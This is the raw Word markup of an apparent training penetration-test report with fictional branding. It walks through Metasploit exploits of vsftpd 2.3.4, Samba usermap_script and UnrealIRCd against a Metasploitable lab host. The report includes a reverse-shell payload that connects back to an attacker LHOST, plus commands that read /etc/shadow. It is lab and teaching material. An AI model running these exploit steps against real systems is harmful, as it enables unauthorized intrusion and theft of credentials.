          <w:pgNumType w:start="1"/>
        </w:sectPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_45otwftv4fyr" w:id="9"/>
      <w:bookmarkEnd w:id="9"/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Appendix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Technical Test Repor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="240" w:lineRule="auto"/>
        <w:jc w:val="left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lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="000000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix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Rule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Assessment Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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="240" w:lineRule="auto"/>
        <w:jc w:val="center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="240" w:lineRule="auto"/>
        <w:jc w:val="center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="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PenTest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(PT)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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="240" w:lineRule="auto"/>
        <w:jc w:val="center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="240" w:lineRule="auto"/>
        <w:jc w:val="center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Dunder Mifflin Paper Co.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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FICTVS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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Agency</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambr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0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambr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line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambr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0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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[5/11/2025]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="center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0" w:lineRule="auto"/>
        <w:jc w:val="center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0" w:lineRule="auto"/>
        <w:jc w:val="center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Rule="auto"/>
        <w:jc w:val="center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="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared by:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Thomas Halczak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Devin Chandler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Roniel Bailon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1"/>
        <w:ind w:left="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xyca9edkwc8t" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical assessment report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Step-by-step exploit process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088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vsFTPd 2.3.4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7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 both Kali and Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Enter into the Kali terminal msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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enter into the terminal: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search vsftpd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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6226810" cy="2209800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16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681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7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type into the console: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Set the target IP with this command: set RHOSTS 192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Next enter: run into the console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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6226810" cy="2527300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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681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Successful exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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Samba remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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 Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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 the metasploitable framework in the application menu, or type “sudo msfdb init &amp;&amp; msfconsole” in the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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find the exploit in metasploitable, first search for Samba, and  find the line exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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126798" cy="983313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15521" l="19225" r="30484" t="70049"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6126798" cy="983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2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select it by typing: “use exploit/multi/samba/usermap_script”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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Next, show payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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088698" cy="801144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13004" l="49806" r="3713" t="76112"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6088698" cy="801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cmd/unix/reverse, this will be the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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076950" cy="700224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36606" l="49806" r="3560" t="5374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700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 the payload, with “set payload cmd/unix/reverse”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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079173" cy="538156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14163" l="49806" r="3560" t="78532"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6079173" cy="538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Type show options, and set RHOST(target), RPORT(vulnerable 445 port), and LHOST(source/attacker).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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55348" cy="415541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13043" l="49806" r="9222" t="36141"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5955348" cy="4155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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOST 192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RPORT 445</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST 192.168.0.15</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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36298" cy="1105781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13152" l="49653" r="3560" t="71739"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5936298" cy="1105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Next type exploit and enter: A remote connection to the metasploitable host is now established.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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91225" cy="3379899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13315" l="49806" r="3560" t="39989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379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Vulnerability #3 UnrealiRCD performed by Roniel Bailon:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/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Log into kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/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Log into metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/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run sudo msfconsole to access metasploit in kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/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run nmap and scan metasploitable ip address of 192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/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run nmap -p 1-65535 -T4 -A -v 192.168.0.20 2&gt;&amp;1 | tee /var/tmp/scan.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="no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53545" cy="3309938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545" cy="3309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1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/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in Kali run “search unreal” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="no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50390" cy="2338946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0390" cy="2338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"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/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Set RHOST to target ip (metasploitable 192.168.0.20)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/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974273" cy="391418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4273" cy="391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1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/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 We then exploit the target by typing in “ exploit -z” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/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122610" cy="2514309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2610" cy="2514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1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/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 Continuing list the sessions that are active “sessions -l”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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307648" cy="3149694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7648" cy="3149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back door was successfully created. First IP address is Kali and the second is the target IP address being Metasploitable. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/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 From Metasploitable type in whoami, hostname, and sudo grep /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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44254" cy="1315634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4254" cy="1315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6" w:type="default"/>
      <w:footerReference r:id="rId27" w:type="default"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="1440" w:left="994" w:right="1440" w:header="720" w:footer="43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ambria"/>
  <w:font w:name="Courier New"/>
  <w:font w:name="Lato Black">
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId1" w:subsetted="0"/>
    <w:embedBoldItalic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SENSITIVITY MARKING</w:t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9">
    <w:pPr>
      <w:spacing w:after="0" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="2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mbria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">    </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">    </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
        <w:b w:val="1"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">SENSITIVITY MARKING </w:t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A">
    <w:pPr>
      <w:spacing w:after="0" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
        <w:b w:val="1"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">SENSITIVITY MARKING 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SENSITIVITY MARKING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center"/>
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria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SENSITIVITY MARKING</w:t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center"/>
      <w:rPr>
        <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria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SENSITIVITY MARKING</w:t>
    </w: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1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="70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5">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2304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3024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3744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4464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5184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904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6624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7344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8064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decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="180"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="180"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
